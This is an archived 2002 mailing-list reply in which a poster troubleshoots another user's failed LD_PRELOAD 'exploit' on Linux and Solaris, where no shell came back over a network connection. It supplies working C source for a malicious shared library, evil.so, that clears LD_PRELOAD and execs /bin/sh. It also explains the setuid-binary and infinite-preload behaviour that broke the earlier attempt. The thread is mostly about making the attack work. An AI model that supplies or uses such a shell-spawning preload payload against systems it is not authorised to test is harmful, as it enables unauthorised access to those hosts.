lsawyerat_private said this stuff: [...] > I've tried this 'exploit' on both Linux 2.4.14 (redhat) and Solaris 2.8 > boxen, and have been unable to get a shell. The shell process is there, > but fails to communicate with the network socket. Ah; /bin/sh is shared on your system as well. To get around this, try the following code for evil.so: ----- #include <unistd.h> #include <stdlib.h> void _init (void) { unsetenv("LD_PRELOAD"); execl("/bin/sh", "sh", 0); } ----- > *** However ***, if i replace "/bin/sh" with "ping some.ip.add.ress" and > attempt the connection, i'm greeted with the following: > > Last login: today from somehost > Sun Microsystems Inc. SunOS 5.8 > ld.so.1: ping: warning: /homes/evil/.ssh/evil.so: open failed: > illegal insecure pathname > some.ip.add.ress is alive > Connection to target closed. Your 'ping' binary is probably setuid-root. What happens is, the shared library executes ping, but the LD_PRELOAD environment variable hasn't gone anywhere. When ping executes, ld.so sees LD_PRELOAD (which is forbidden for setuid programs), complains, and doesn't execute it. On the other hand, when executing your shared /bin/sh, every /bin/sh process once again preloads evil.so, creating an infinite execl(3) loop. The code above should account for that. ari
This archive was generated by hypermail 2b30 : Thu Jun 27 2002 - 17:01:16 PDT